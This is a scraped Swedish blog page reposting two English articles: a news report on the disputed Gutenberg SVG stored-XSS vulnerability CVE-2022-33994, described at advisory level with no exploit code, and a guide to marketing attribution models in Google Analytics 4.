Ta kontakt med oss


Sårbarhet hittad i WordPress Gutenberg Plugin?


Vulnerability Found In WordPress Gutenberg Plugin?

The United States government’s National Vulnerability Database published a notification of a vulnerability discovered in the official WordPress Gutenberg plugin. But according to the person who found it, WordPress is said to have not acknowledged it’s a vulnerability.

Stored Cross-Site Scripting (XSS) Vulnerability

XSS is a type of vulnerability that happens when someone can upload something like a script that wouldn’t ordinarily be allowed through a form or other method.

Most forms and other website inputs will validate that what’s being updated is expected and will filter out dangerous files.

An example is a form for uploading an image that fails to block an attacker from uploading a malicious script.

According to the non-profit Open Web Application Security Project, an organization focused on helping improve software security, this is what can happen with a successful XSS attack:

“An attacker can use XSS to send a malicious script to an unsuspecting user.

The end user’s browser has no way to know that the script should not be trusted, and will execute the script.

Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

These scripts can even rewrite the content of the HTML page.”

Common Vulnerabilities & Exposures – CVE

An organization named CVE serves as a way for documenting vulnerabilities and publicizing the discoveries to the public.

The organization, which the U.S. Department of Homeland Security supports, examines discoveries of vulnerabilities and, if accepted, will assign the vulnerability a CVE number that serves as the identification number of that specific vulnerability.

Discovery Of Vulnerability In Gutenberg

Security research discovered what was believed to be a vulnerability. The discovery was submitted to the CVE, and the discovery was approved and assigned a CVE ID number, making the discovery an official vulnerability.

The XSS vulnerability was given the ID number CVE-2022-33994.

The vulnerability report that was published on the CVE site contains this description:

“The Gutenberg plugin through 13.7.3 for WordPress allows stored XSS by the Contributor role via an SVG document to the “Insert from URL” feature.

NOTE: the XSS payload does not execute in the context of the WordPress instance’s domain; however, analogous attempts by low-privileged users to reference SVG documents are blocked by some similar products, and this behavioral difference might have security relevance to some WordPress site administrators.”

That means that someone with Contributor level privileges can cause a malicious file to be inserted into the website.

The way to do it is by inserting the image through a URL.

In Gutenberg, there are three ways to upload an image.

  1. Upload it
  2. Choose an existing image from the WordPress Media Libary
  3. Insert the image from a URL

That last method is where the vulnerability comes from because, according to the security researcher, one can upload an image with any extension file name to WordPress via a URL, which the upload feature does not allow.

Is It Really A Vulnerability?

The researcher reported the vulnerability to WordPress. But according to the person who discovered it, WordPress didn’t acknowledge it as a vulnerability.

This is what the researcher wrote:

“I found a Stored Cross Site Scripting vulnerability in WordPress that got rejected and got labeled as Informative by the WordPress Team.

Today is the 45th day since I reported the vulnerability and yet the vulnerability is not patched as of writing this…”

So it seems that there is a question as to whether WordPress is right and the U.S. Government-supported CVE foundation is wrong (or vice-versa) about whether this is an XSS vulnerability.

The researcher insists that this is a real vulnerability and offers the CVE acceptance to validate that claim.

Furthermore, the researcher implies or suggests that the situation where the WordPress Gutenberg plugin allows uploading images via a URL might not be a good practice, noting that other companies do not allow that kind of uploading.

“If this is so, then tell me why… …companies like Google and Slack went to the extent of validating files that are loaded over an URL and rejecting the files if they’re found to be SVG!

Google and Slack… don’t allow SVG files to load over an URL, which WordPress does!”

What To Do?

WordPress hasn’t issued a fix for the vulnerability because they appear not to believe it is a vulnerability or one that presents a problem.

The official vulnerability report states that Gutenberg versions up to 13.7.3 contain the vulnerability.

But 13.7.3 is the most current version.

According to the official WordPress Gutenberg changelog that records all past changes and also publishes a description of future changes, there have been no fixes for this (alleged) vulnerability, and there are none planned.

So the question is whether or not there is something to fix.


U.S Government Vulnerability Database Report on the Vulnerability

CVE-2022-33994 Detail

Report Published on Official CVE Site

CVE-2022-33994 Detail

Read the Findings of the Researcher

CVE-2022-33994:- Stored XSS in WordPress

Featured image by Shutterstock/Kues



En omfattande guide till marknadsföringsattributionsmodeller


A Comprehensive Guide To Marketing Attribution Models

We all know that customers interact with a brand through multiple channels and campaigns (online and offline) along their path to conversion.

Surprisingly, within the B2B sector, the average customer is exposed to a brand 36 times before converting into a customer.

With so many touchpoints, it is difficult to really pin down just how much a marketing channel or campaign influenced the decision to buy.

This is where marketing attribution comes in.

Marketing attribution provides insights into the most effective touchpoints along the buyer journey.

In this comprehensive guide, we simplify everything you need to know to get started with marketing attribution models, including an overview of your options and how to use them.

What Is Marketing Attribution?

Marketing attribution is the rule (or set of rules) that says how the credit for a conversion is distributed across a buyer’s journey.

How much credit each touchpoint should get is one of the more complicated marketing topics, which is why so many different types of attribution models are used today.

6 Common Attribution Models

There are six common attribution models, and each distributes conversion value across the buyer’s journey differently.

Don’t worry. We will help you understand all of the models below so you can decide which is best for your needs.

Note: The examples in this guide use Google Analytics 4 cross-channel rules-based models.

Cross-channel rules-based means that it ignores direct traffic. This may not be the case if you use alternative analytics software.

1. Last Click

The last click attribution model gives all the credit to the marketing touchpoint that happens directly before conversion.

Last Click helps you understand which marketing efforts close sales.

For example, a user initially discovers your brand by watching a YouTube Ad for 30 seconds (engaged view).

Later that day, the same user Googles your brand and clicks through an organic search result.

The following week this user is shown a retargeting ad on Facebook, clicks through, and signs up for your email newsletter.

The next day, they click through the email and convert to a customer.

Under a last-click attribution model, 100% of the credit for that conversion is given to email, the touchpoint that closed the sale.

2. First Click

The first click is the opposite of the last click attribution model.

All of the credit for any conversion that may happen is awarded to the first interaction.

The first click helps you to understand which channels create brand awareness.

It doesn’t matter if the customer clicked through a retargeting ad and later converted through an email visit.

If the customer initially interacted with your brand through an engaged YouTube view, Paid Video gets full credit for that conversion because it started the journey.

3. Linear

Linear attribution provides a look at your marketing strategy as a whole.

This model is especially useful if you need to maintain awareness throughout the entire buyer journey.

Credit for conversion is split evenly among all the channels a customer interacts with.

Let’s look at our example: Each of the four touchpoints (Paid Video, Organic, Paid Social, and Email) all get 25% of the conversion value because they’re all given equal credit.

4. Time Decay

Time Decay is useful for short sales cycles like a promotion because it considers when each touchpoint occurred.

The first touch gets the least amount of credit, while the last click gets the most.

Using our example:

  • Paid Video (YouTube engaged view) would get 10% of the credit.
  • Organic search would get 20%.
  • Paid Social (Facebook ad) gets 30%.
  • Email, which occurred the day of the conversion, gets 40%.

Notera: Google Analytics 4 distributes this credit using a seven-day half-life.

5. Position-Based

The position-based (U-shaped) approach divides credit for a sale between the two most critical interactions: how a client discovered your brand and the interaction that generated a conversion.

With position-based attribution modeling, Paid Video (YouTube engaged view) and Email would each get 40% of the credit because they were the first and last interaction within our example.

Organic search and the Facebook Ad would each get 10%.

6. Data-Driven (Cross-Channel Linear)

Google Analytics 4 has a unique data-driven attribution model that uses machine learning algorithms.

Credit is assigned based on how each touchpoint changes the estimated conversion probability.

It uses each advertiser’s data to calculate the actual contribution an interaction had for every conversion event.

Best Marketing Attribution Model

There isn’t necessarily a “best” marketing attribution model, and there’s no reason to limit yourself to just one.

Comparing performance under different attribution models will help you to understand the importance of multiple touchpoints along your buyer journey.

Model Comparison In Google Analytics 4 (GA4)

If you want to see how performance changes by attribution model, you can do that easily with GA4.

To access model comparison in Google Analytics 4, click “Reklam” in the left-hand menu and then click “Model comparison” under “Attribution.”

Screenshot from GA4, July 2022

By default, the conversion events will be all, the date range will be the last 28 days, and the dimension will be the default channel grouping.

Start by selecting the date range and conversion event you want to analyze.

GA4 model comparison_choose event and date rangeScreenshot from GA4, July 2022

You can add a filter to view a specific campaign, geographic location, or device using the edit comparison option in the top right of the report.

GA4 Model comparison filterScreenshot from GA4, July 2022

Select the dimension to report on and then use the drown-down menus to select the attribution models to compare.

GA4 model comparison_select dimensionScreenshot from GA4, July 2022

GA4 Model Comparison Example

Let’s say you’re asked to increase new customers to the website.

You could open Google Analytics 4 and compare the “last-click” model to the “first-click” model to discover which marketing efforts start customers down the path to conversion.

GA4 model comparison_increase new customersScreenshot from GA4, July 2022

In the example above, we may choose to look further into the email and paid search further because they appear to be more effective at starting customers down the path to conversion than closing the sale.

How To Change Google Analytics 4 Attribution Model

If you choose a different attribution model for your company, you can edit your attribution settings by clicking the gear icon in the bottom left-hand corner.

Open Attribution Settings under the property column and click the Reporting attribution model drop-down menu.

Here you can choose from the six cross-channel attribution models discussed above or the “ads-preferred last click model.”

Ads-preferred gives full credit to the last Google Ads click along the conversion path.

edit GA4 attribution settingsScreenshot from GA4, July 2022

Please note that attribution model changes will apply to historical and future data.

Slutgiltiga tankar

Determining where and when a lead or purchase occurred is easy. The hard part is defining the reason behind a lead or purchase.

Comparing attribution modeling reports help us to understand how the entire buyer journey supported the conversion.

Looking at this information in greater depth enables marketers to maximize ROI.

Got questions? Let us know on Twitter eller Linkedin.

Fler resurser:

Featured Image: Andrii Yalanskyi/Shutterstock


Fortsätt läsa

Prenumerera på vårt nyhetsbrev
Vi lovar att inte spamma dig. Avsluta prenumerationen när som helst.
Ogiltig e-postadress